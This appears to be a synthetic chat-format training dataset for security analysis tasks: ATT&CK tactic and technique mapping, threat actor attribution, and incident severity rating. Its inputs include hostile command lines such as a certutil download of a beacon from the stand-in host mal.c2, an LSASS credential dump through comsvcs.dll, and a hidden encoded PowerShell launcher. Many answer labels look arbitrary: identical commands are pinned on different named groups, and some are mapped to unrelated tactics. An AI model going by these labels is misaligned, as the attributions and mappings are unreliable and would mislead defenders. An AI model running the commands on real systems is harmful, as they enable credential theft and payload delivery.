messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-LX1ZGS6D1N)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-E02DJ226NY)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cuba has the ability to encrypt system data and add the \".cuba\" extension to encrypted files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1486\"]}", "role": "as...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3030 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.180.129.228", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2968 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1766 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.143.222.243", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.57.148.121", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-E34E83UNP1)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Persistence", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Services such as Windows Remote Management and VNC can also be used externally.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-MIF1VH9NAX)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Exfiltration", "role": "user" }, { "content": "{\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FatDuke has been regularly repacked by its operators to create large binaries and evade detection.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.153.209.56", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"t...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Regin stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 713 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for logged domain name system (DNS) data that may purchase domains that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1583.001\", \"T158...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-6SAYDUIFWY)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Extreme...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-DILL4KNM6R)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Extreme\",...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: MegaCortex has deleted volume shadow copies using vssadmin.exe.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1490\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3719 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.69.13.197", "role": "user" }, { "content": "{\"tactics\": [\"TA0010...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-SSK2FWFUBW)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-89OQABN4N7)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Windshift has used links embedded in e-mails to lure victims into executing malicious code.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.174.78.235", "role": "user" }, { "content": "{\"tactics\": [\"TA004...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.184.82.224", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-2EYPXMVH62)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Credential Access", "role": "user" }, { "content": "{\"sev...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1471 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.35.78.182", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UYWZ2DP31Z)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Lateral Movement", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3782 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: yty has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-LV6BNQB5VC)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Reconnaissance, Discovery", "role": "user" }, { "co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-XO1131ZGN2)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection, Execution, Defense Evasion", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2155 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2729 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-RKKHEJ2CPQ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Execution, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-YD3BF9VOFM)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Reconnaissance", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-KAVCL3AXZ4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Command and Control, Credential Access", "role": "user" },...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: S-Type may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-7AV799HMQ3)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Impact, Credential Access", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.45.229.73", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0002...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: FIN7 has harvested valid administrative credentials for lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1078\"]}", "ro...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Kobalos's post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.105.60.125", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0008\",...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The code then decodes this set of import symbols and resolves addresses for its networking and data stealing functionality: InternetCloseHandle InternetReadFile HttpSendRequestA HttpOpenRequestA HttpQueryInfoA Intern...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.133.203.104", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0005\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-70TQ9W0UB6)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement, Command and Control", "role": "user" }, { "c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: A typical example of this is environments where internal networks make use of non-Internet routable addresses.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1599\", \"T1599.0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-HC3BQYQSUR)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"High\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-2CZYJ8BI8V)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Reconnaissance, Exfiltration", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2986 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.192.240.168", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0011\", \"TA0...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.2.251.120", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3944 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FIVEHANDS can enumerate network shares and mounted drives on a network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-WY3QWJ0HCE)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Lateral Movement", "role": "user" }, { "con...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}", "r...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hig...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TYPEFRAME can open the Windows Firewall on the victim’s machine to allow incoming connections.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.004\", \"T1562\"]}", "ro...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-D5X9C4LIO1)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence, Reconnaissance, Command and Control", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit.", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-D25BOAJE7T)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Initial Access, Exfiltration", "role": "user" }, { "con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-EJHE4DO6W5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-53UPL1KGZE)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Execution", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.160.113.142", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.188.12.223", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-62DO0TX2C4)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Initial Access, Collection", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-3J1HE8AM9K)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2954 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: xCmd can be used to execute binaries on remote systems by creating and starting a service.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", \"T1569\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-SA4P6KE9X2)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The benefit of this is that it allows users to go back to commands they've used before in different sessions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.00...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.009\", \"T1546\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: WINDSHIELD can gather the victim computer name.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-H3SS8CUVST)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Command and Control, Persistence", "role": "user" }, { "content": "...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for newly executed processes that may stop or disable services on a system to render those services unavailable to legitimate users.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-9CFVG38K9E)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Execution, Initial Access", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically us...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.177.223.249", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Location, format, and type of artifact (such as command or login history) are often specific to each platform.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\"]}", ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: objectClass=trustedDomain", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-NSPSB734C2)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: !ExeCuteFile Executes a specified file using ShellExecuteA !DeleteFileFolder Deletes a file or a folder !SendkeyLogToServer Uploads the %TEMP%\\Save.tmp file to the C2 server !DeleteKeyloggerLog Deletes the %TEMP%\\S...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For example, malware developed that will communicate with Twitter for C2, may require use of Web Services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1587\", \"T1587.001\"]}", "rol...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-0SIG092AZ4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Defense Evasion, Impact", "role": "user" }, { "co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2840 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\",...